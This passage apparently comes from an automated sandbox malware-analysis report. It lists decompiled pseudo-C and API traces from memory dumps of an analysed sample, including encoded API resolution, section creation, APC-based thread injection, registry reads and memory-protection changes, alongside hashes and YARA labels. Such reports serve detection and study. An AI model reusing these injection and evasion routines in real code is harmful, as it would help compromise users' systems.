				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E027775C4(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x277d230; // 0x27ba5a8
					_t1 = _t23 + 0x277e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x277d230; // 0x27ba5a8
					_t2 = _t26 + 0x277e787; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02774C31(_t54);
					} else {
						_t30 =  *0x277d230; // 0x27ba5a8
						_t5 = _t30 + 0x277e774; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x277d230; // 0x27ba5a8
							_t7 = _t33 + 0x277e797; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x277d230; // 0x27ba5a8
								_t9 = _t36 + 0x277e756; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x277d230; // 0x27ba5a8
									_t11 = _t39 + 0x277e7ac; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02774F73(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x027740be
0x027740c2
0x02774184
0x027740c8
0x027740c8
0x027740cd
0x027740e0
0x027740e2
0x027740e7
0x027740ef
0x027740f6
0x027740fa
0x027740fd
0x0277417c
0x0277417d
0x027740ff
0x027740ff
0x02774104
0x0277410c
0x02774110
0x02774113
0x00000000
0x02774115
0x02774115
0x0277411a
0x02774122
0x02774126
0x02774129
0x00000000
0x0277412b
0x0277412b
0x02774130
0x02774138
0x0277413c
0x0277413f
0x00000000
0x02774141
0x02774141
0x02774146
0x0277414e
0x02774152
0x02774155
0x00000000
0x02774157
0x0277415d
0x02774162
0x02774169
0x02774170
0x02774173
0x00000000
0x02774175
0x02774178
0x02774178
0x02774173
0x02774155
0x0277413f
0x02774129
0x02774113
0x027740fd
0x02774192

APIs

Part of subcall function 027775C4: RtlAllocateHeap.NTDLL(00000000,00000000,02775068), ref: 027775D0

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,02777E5B,?,?,?,?,00000000,00000000), ref: 027740D4
GetProcAddress.KERNEL32(00000000,7243775A), ref: 027740F6
GetProcAddress.KERNEL32(00000000,614D775A), ref: 0277410C
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02774122
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02774138
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 0277414E

Part of subcall function 02774F73: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,0277416E), ref: 02774FD0
Part of subcall function 02774F73: memset.NTDLL ref: 02774FF2

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: dacacc9dc7dc04254cc768a58912f6930d6feb10a87e89dbef2cb1971029e85c
Instruction ID: 4ce7a2316a8cbf66f325ece2039a459a5a6b374930e646c5709406d31f2cc980
Opcode Fuzzy Hash: dacacc9dc7dc04254cc768a58912f6930d6feb10a87e89dbef2cb1971029e85c
Instruction Fuzzy Hash: D92108B190020AAFDB21EFA9CC44E5B77FCEB193547058566E505E7210E774EA05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02771650, Relevance: 9.1, APIs: 6, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E02771650(void* __eax, void* _a4, char* _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				char* _t49;
				char* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 =  &(_t49[_t5]);
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 = StrStrA(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t33 = RtlAllocateHeap( *0x277d1f0, 0, _a16 + _t55); // executed
						_t44 = _t33;
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x02771658
0x0277165d
0x0277165f
0x02771666
0x02771678
0x02771678
0x0277167c
0x0277167e
0x02771681
0x02771684
0x0277168d
0x02771697
0x0277169b
0x027716a0
0x027716b0
0x027716b6
0x027716ba
0x0277170b
0x027716bc
0x027716bc
0x027716c4
0x027716d3
0x027716d8
0x027716e8
0x027716ee
0x027716f9
0x02771703
0x02771707
0x02771707
0x027716ba
0x02771712
0x02771719

APIs

lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 02771684
StrStrA.SHLWAPI(00000000,?), ref: 02771691
RtlAllocateHeap.NTDLL(00000000,?), ref: 027716B0
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 027716C4
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 027716D3
memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 027716EE

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: ebfaaf5b2033151c4b6f356d88c6c86dc09b985de9506cace21be2ace01431c0
Instruction ID: bb66ec7ae9ceb8ac9cff024254f5518524e0e81ff3d5d10ced3964d6a3984e04
Opcode Fuzzy Hash: ebfaaf5b2033151c4b6f356d88c6c86dc09b985de9506cace21be2ace01431c0
Instruction Fuzzy Hash: C9216236900209AFCF129F68CC44B9EBF79EF85314F058159EC04A7305C771DA19DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 05406BCD, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,05404EA1,00000000,05407CE2), ref: 05406BE4
QueueUserAPC.KERNELBASE(05404EA1,00000000,054205B3,?,?,05404EA1,054205B3,00000000,?), ref: 05406BF9
GetLastError.KERNEL32(00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C04
TerminateThread.KERNEL32(00000000,00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C0E
CloseHandle.KERNEL32(00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C15
SetLastError.KERNEL32(00000000,?,?,05404EA1,054205B3,00000000,?), ref: 05406C1E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 83336e53a7cf600859acf4db2ca01153f16b57906325980b57c1b50235d74415
Instruction ID: 62754471cf6947199bae3ff662989953ccf2d74f20f24b45169744fd1cd65d42
Opcode Fuzzy Hash: 83336e53a7cf600859acf4db2ca01153f16b57906325980b57c1b50235d74415
Instruction Fuzzy Hash: BBF08232114331BBD3351B61AC0EFEFBE69FB08711F824414FA0691184CF3088108BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0277A360, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0277A360(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				void* _t63;
				intOrPtr _t65;
				char _t68;
				void* _t71;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x277d2ec);
					_t96 = 0x80000002;
					L6:
					_t60 = E0277745D(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					_t63 = E02778557(_t97, _t105, _t96, _t60); // executed
					if(_t63 != 0) {
						L27:
						E02774C31(_a8);
						goto L29;
					}
					_t65 =  *0x277d230; // 0x27ba5a8
					_t16 = _t65 + 0x277e908; // 0x65696c43
					_t68 = E0277745D(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d0277c0, executed
						_t71 = E02777325( *_t33, _t96, _a8,  *0x277d2e4,  *((intOrPtr*)( *_t29 + 0x28))); // executed
						if(_t71 == 0) {
							_t72 =  *0x277d230; // 0x27ba5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x277ea0f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x277e927; // 0x55434b48
								_t73 = _t34;
							}
							if(E02777D0C( &_a24, _t73,  *0x277d2e4,  *0x277d2e8,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x277d230; // 0x27ba5a8
									_t44 = _t75 + 0x277e893; // 0x74666f53
									_t78 = E0277745D(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d0277c0
										E02773FF3( *_t47, _t96, _a8,  *0x277d2e8, _a24);
										_t49 = _t105 + 0x10; // 0x3d0277c0
										E02773FF3( *_t49, _t96, _t103,  *0x277d2e0, _a16);
										E02774C31(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d0277c0
									E02773FF3( *_t40, _t96, _a8,  *0x277d2e8, _a24);
									_t43 = _t105 + 0x10; // 0x3d0277c0
									E02773FF3( *_t43, _t96, _a8,  *0x277d2e0, _a16);
								}
								if( *_t105 != 0) {
									E02774C31(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d0277c0
					if(E027751C4( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d0277c0
							E02777325( *_t26, _t96, _a8, _a24, _t104);
						}
						E02774C31(_t104);
						_t102 = _a16;
					}
					E02774C31(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x277d2ec);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}

0x0277a360
0x0277a369
0x0277a370
0x0277a375
0x0277a3e4
0x0277a3ea
0x0277a3ef
0x0277a3f8
0x0277a3ff
0x0277a402
0x0277a576
0x0277a57d
0x0277a57d
0x0277a582
0x0277a584
0x0277a584
0x0277a58d
0x0277a58d
0x0277a408
0x0277a40d
0x0277a414
0x0277a56c
0x0277a56f
0x00000000
0x0277a56f
0x0277a41a
0x0277a41f
0x0277a428
0x0277a42f
0x0277a432
0x0277a47c
0x0277a47c
0x0277a48f
0x0277a492
0x0277a499
0x0277a4a1
0x0277a4a6
0x0277a4b0
0x0277a4b0
0x0277a4a8
0x0277a4a8
0x0277a4a8
0x0277a4a8
0x0277a4d2
0x0277a4da
0x0277a508
0x0277a50d
0x0277a516
0x0277a51b
0x0277a51f
0x0277a551
0x0277a521
0x0277a52e
0x0277a531
0x0277a541
0x0277a544
0x0277a54a
0x0277a54a
0x0277a4dc
0x0277a4e9
0x0277a4ec
0x0277a4fe
0x0277a501
0x0277a501
0x0277a55b
0x0277a567
0x0277a55d
0x0277a560
0x0277a560
0x0277a55b
0x0277a4d2
0x00000000
0x0277a499
0x0277a441
0x0277a44b
0x0277a44d
0x0277a452
0x0277a456
0x0277a458
0x0277a463
0x0277a466
0x0277a466
0x0277a46c
0x0277a471
0x0277a471
0x0277a477
0x00000000
0x0277a477
0x0277a37a
0x00000000
0x0277a3a1
0x0277a3ac
0x0277a3c2
0x0277a3c8
0x0277a3d0
0x00000000
0x0277a3d0

APIs

StrChrA.SHLWAPI(0277544E,0000005F,00000000,00000000,00000104), ref: 0277A393
memcpy.NTDLL(?,0277544E,?), ref: 0277A3AC
lstrcpy.KERNEL32(?), ref: 0277A3C2

Part of subcall function 0277745D: lstrlen.KERNEL32(?,0277D2E0,75187FC0,00000000,0277534B,?,?,?,?,?,027770B5,?), ref: 02777466
Part of subcall function 0277745D: mbstowcs.NTDLL ref: 0277748D
Part of subcall function 0277745D: memset.NTDLL ref: 0277749F

Part of subcall function 02773FF3: lstrlenW.KERNEL32(0277544E,?,?,0277A536,3D0277C0,80000002,0277544E,02775886,74666F53,4D4C4B48,02775886,?,3D0277C0,80000002,0277544E,?), ref: 02774013

Part of subcall function 02774C31: RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

lstrcpy.KERNEL32(?,00000000), ref: 0277A3E4

Strings

\, xrefs: 0277A3C8

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
String ID: \
API String ID: 2598994505-2967466578
Opcode ID: f31abd6980bb67fc43948ec5aa5db9c43d6f2cc2c35db585a610c24070ef928c
Instruction ID: 8b4d567188890face18cff641c705e8937a4671cdbcb95076066c2401345d0b1
Opcode Fuzzy Hash: f31abd6980bb67fc43948ec5aa5db9c43d6f2cc2c35db585a610c24070ef928c
Instruction Fuzzy Hash: 94512C7290020AAFDF229FA4DD48EAF7BBAFF08314F008565F915A6160D735DA25EF11

Uniqueness

Uniqueness Score: -1.00%

Function 0541FC12, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(0542E140,75144D40,00000018,00000001,00000000,75144D40,0540CEAB,?,?), ref: 0541FC28
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,75144D40,0540CEAB,?,?,?,?,?,?,?,?,?,?,0540202D), ref: 0541FC4D
GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,?,?,?,?,?,0540202D,?), ref: 0541FC5D

Strings

KERNEL32.DLL, xrefs: 0541FC58
NTDLL.DLL, xrefs: 0541FC36

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: e729876ab29f48a86a507f9931034d74361d46c04bcca6e5c04a6dbb8302f266
Instruction ID: 8ab41b92210b918db1662f21504de9e2f8b8757324d8780eb55854504d3a9c49
Opcode Fuzzy Hash: e729876ab29f48a86a507f9931034d74361d46c04bcca6e5c04a6dbb8302f266
Instruction Fuzzy Hash: 96012B72664331BAE7248F15ED46BE67AB9B750300F50043BFC09C3240EBB0945AAB76

Uniqueness

Uniqueness Score: -1.00%

Function 02773267, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E02773267(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t18;
				intOrPtr _t22;
				intOrPtr _t23;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr* _t32;

				_t30 = __edi;
				_t29 = _a4;
				_t31 = __eax;
				_t18 = E027783EC(_t29, __edi, __eax); // executed
				_a4 = _t18;
				if(_t18 != 0) {
					memset( &_v60, 0, 0x38);
					_t22 =  *0x277d230; // 0x27ba5a8
					_v64 = 0x3c;
					if(_a8 == 0) {
						_t7 = _t22 + 0x277e4e0; // 0x70006f
						_t23 = _t7;
					} else {
						_t6 = _t22 + 0x277e92c; // 0x750072
						_t23 = _t6;
					}
					_v36 = _t31;
					_t32 = __imp__;
					_v52 = _t23;
					_v48 = _t29;
					_v44 = _t30;
					 *_t32(0);
					_push( &_v64);
					if( *0x277d0e4() != 0) {
						_a4 = _a4 & 0x00000000;
					} else {
						_a4 = GetLastError();
					}
					 *_t32(1);
				}
				return _a4;
			}

0x02773267
0x0277326e
0x02773272
0x02773277
0x0277327e
0x02773281
0x0277328b
0x02773290
0x0277329c
0x027732a3
0x027732ad
0x027732ad
0x027732a5
0x027732a5
0x027732a5
0x027732a5
0x027732b3
0x027732b6
0x027732be
0x027732c1
0x027732c4
0x027732c7
0x027732cc
0x027732d5
0x027732e2
0x027732d7
0x027732dd
0x027732dd
0x027732e8
0x027732e8
0x027732f0

APIs

Part of subcall function 027783EC: SysAllocString.OLEAUT32(?), ref: 02778448
Part of subcall function 027783EC: SysAllocString.OLEAUT32(0070006F), ref: 0277845C
Part of subcall function 027783EC: SysAllocString.OLEAUT32(00000000), ref: 0277846E
Part of subcall function 027783EC: SysFreeString.OLEAUT32(00000000), ref: 027784D2

memset.NTDLL ref: 0277328B
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 027732C7
GetLastError.KERNEL32 ref: 027732D7
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 027732E8

Strings

<, xrefs: 0277329C

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
String ID: <
API String ID: 593937197-4251816714
Opcode ID: c892e7dfab9c50c1781aa987601e239fab58b46de45b6a745717468dd73c1344
Instruction ID: 03ad5008fe4b2e08b344418f58f4b10f2442f6e17ecc81b24b8d2ba13542043f
Opcode Fuzzy Hash: c892e7dfab9c50c1781aa987601e239fab58b46de45b6a745717468dd73c1344
Instruction Fuzzy Hash: FB110971D40218ABDB10EFA9D889FDE7BBCBB18394F00845AF909E7240D7749604CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 02774838, Relevance: 7.6, APIs: 5, Instructions: 92
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02774838(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				long _t14;
				void* _t18;
				long _t21;
				void* _t25;
				void* _t26;
				signed int* _t27;
				signed short* _t28;
				CHAR* _t30;
				long _t31;
				WCHAR** _t32;

				_t6 =  *0x277d228; // 0xbd092303
				_t32 = _a4;
				_a4 = _t6 ^ 0xd05b5869;
				_t8 =  *0x277d230; // 0x27ba5a8
				_t3 = _t8 + 0x277e84d; // 0x61636f4c
				_t25 = 0;
				_t30 = E02774200(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x277d234, 1, 0, _t30);
					E02774C31(_t30);
				}
				_t12 =  *0x277d214; // 0x4000000a
				if(_t12 != 6 || _t12 < 2) {
					if( *_t32 == 0) {
						goto L11;
					}
					_t18 = E027731DD(); // executed
					if(_t18 != 0) {
						goto L11;
					}
					_t28 = StrChrW( *_t32, 0x20);
					if(_t28 != 0) {
						 *_t28 =  *_t28 & 0x00000000;
						_t28 =  &(_t28[1]);
					}
					_t21 = E02773267(0, _t28,  *_t32, 0); // executed
					_t31 = _t21;
					if(_t31 == 0) {
						if(_t25 == 0) {
							goto L21;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							goto L19;
						}
					}
					goto L11;
				} else {
					L11:
					_t27 = _a8;
					if(_t27 != 0) {
						 *_t27 =  *_t27 | 0x00000001;
					}
					_t14 = E02777E3F(_t32, _t26); // executed
					_t31 = _t14;
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t27 != 0 && _t31 != 0) {
						 *_t27 =  *_t27 & 0xfffffffe;
					}
					L19:
					if(_t25 != 0) {
						CloseHandle(_t25);
					}
					L21:
					return _t31;
				}
			}

0x02774839
0x02774840
0x0277484a
0x0277484e
0x02774854
0x02774861
0x02774868
0x0277486c
0x0277487e
0x02774880
0x02774880
0x02774885
0x0277488c
0x02774897
0x00000000
0x00000000
0x02774899
0x027748a0
0x00000000
0x00000000
0x027748ad
0x027748b1
0x027748b3
0x027748b8
0x027748b8
0x027748c0
0x027748c5
0x027748c9
0x027748cd
0x00000000
0x00000000
0x027748db
0x027748df
0x00000000
0x00000000
0x027748df
0x00000000
0x027748e1
0x027748e1
0x027748e1
0x027748e7
0x027748e9
0x027748e9
0x027748ee
0x027748f3
0x027748f7
0x02774909
0x02774909
0x0277490d
0x02774913
0x02774913
0x02774916
0x02774918
0x0277491b
0x0277491b
0x02774922
0x02774928
0x02774928

APIs

Part of subcall function 02774200: lstrlen.KERNEL32(?,00000000,00000000,00000027,E8FA7DD7,00000000,74ECC740,027770CE,74666F53,00000000,?,00000000,?,?,027779D7), ref: 02774236
Part of subcall function 02774200: lstrcpy.KERNEL32(00000000,00000000), ref: 0277425A
Part of subcall function 02774200: lstrcat.KERNEL32(00000000,00000000), ref: 02774262

CreateEventA.KERNEL32(0277D234,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,0277546D,?,?,?), ref: 02774877

Part of subcall function 02774C31: RtlFreeHeap.NTDLL(00000000,00000000,02775130,00000000,?,?,00000000,?,?,?,?,?,?,02778792,00000000), ref: 02774C3D

StrChrW.SHLWAPI(0277546D,00000020,61636F4C,00000001,00000000,?,?,00000000,?,0277546D,?,?,?), ref: 027748A7
WaitForSingleObject.KERNEL32(00000000,00004E20,0277546D,00000000,?,00000000,?,0277546D,?,?,?,?,?,?,?,027738C3), ref: 027748D5
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,0277546D,?,?,?), ref: 02774903
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,0277546D,?,?,?), ref: 0277491B

Memory Dump Source

Source File: 00000002.00000002.445632786.0000000002771000.00000020.00000001.sdmp, Offset: 02770000, based on PE: true

Associated: 00000002.00000002.445623558.0000000002770000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445653036.000000000277C000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.445663216.000000000277D000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.445680180.000000000277F000.00000002.00000001.sdmp Download File

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 02918196a37d89d3a889b6f7b3d17f657ddaa72f455d53c222495246f9c24f24
Instruction ID: 1624e7465699b2325efeb0a503edd884ea78bd622b29a830088c5d106f011c51
Opcode Fuzzy Hash: 02918196a37d89d3a889b6f7b3d17f657ddaa72f455d53c222495246f9c24f24
Instruction Fuzzy Hash: 57212B32A403969BDF325BA89C59B5B73F9FF48714F054A25FD0197240DB74CC158B90

Uniqueness

Uniqueness Score: -1.00%

Function 0542207B, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 05407DEB: RegCreateKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E00
Part of subcall function 05407DEB: lstrlen.KERNEL32(059587E8,00000000,00000000,00000000,?,?,?,05422097,00000000,00000000,00000001,75144D40,?,?,?,05412103), ref: 05407E2E

RegQueryValueExA.KERNELBASE(00000000,05406702,00000000,05406702,00000000,?,00000000,00000000,00000000,00000001,75144D40,?,?,?,05412103,Ini), ref: 054220B3
RtlAllocateHeap.NTDLL(00000000,?), ref: 054220C7
RegQueryValueExA.ADVAPI32(00000000,05406702,00000000,05406702,00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40), ref: 054220E1
HeapFree.KERNEL32(00000000,?,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702), ref: 054220FD
RegCloseKey.KERNELBASE(00000000,?,?,?,05412103,Ini,05406702,00000000,00000001,00000000,75144D40,?,?,?,05406702,00000000), ref: 0542210B

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: ec8a85cb5e35dcfd07021d951c1f4b66bdc2d4b8d33a6bc944bd7de11a93ae4d
Instruction ID: b873448140c993102cb8f38ea1b107429e5cab7b378a904caaf33cc4afe864d3
Opcode Fuzzy Hash: ec8a85cb5e35dcfd07021d951c1f4b66bdc2d4b8d33a6bc944bd7de11a93ae4d
Instruction Fuzzy Hash: 4A1179B6514129BFCB119F95CC85CFE7F7EFB48250B920066FA0193210EAB1AE12DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0540882D, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000000,00000040,00000000,00000000,00000000,?,0542A578,0000001C,054016AB,?,00000000,00000000), ref: 05408852
GetLastError.KERNEL32 ref: 0540885A
VirtualQuery.KERNEL32(?,?,0000001C), ref: 05408871
VirtualProtect.KERNEL32(?,?,-392CC87E,?), ref: 05408896
SetLastError.KERNEL32(?), ref: 0540889F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 302b7a0a1c0e930178ffdf23cde49d60ac56519092d945366bbec9deeab8dff0
Instruction ID: cb08c31de09b0a07194716d92a09471140595173a332d9477c1c99357acc8ddd
Opcode Fuzzy Hash: 302b7a0a1c0e930178ffdf23cde49d60ac56519092d945366bbec9deeab8dff0
Instruction Fuzzy Hash: 72014C3250021AEFAF119FA5DD458EEBBBEFF08214B008036F94193290DB7199509B60

Uniqueness

Uniqueness Score: -1.00%

Function 054165F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 05407DEB: RegCreateKeyA.ADVAPI32(80000001,059587E8,?), ref: 05407E00
Part of subcall function 05407DEB: lstrlen.KERNEL32(059587E8,00000000,00000000,00000000,?,?,?,05422097,00000000,00000000,00000001,75144D40,?,?,?,05412103), ref: 05407E2E

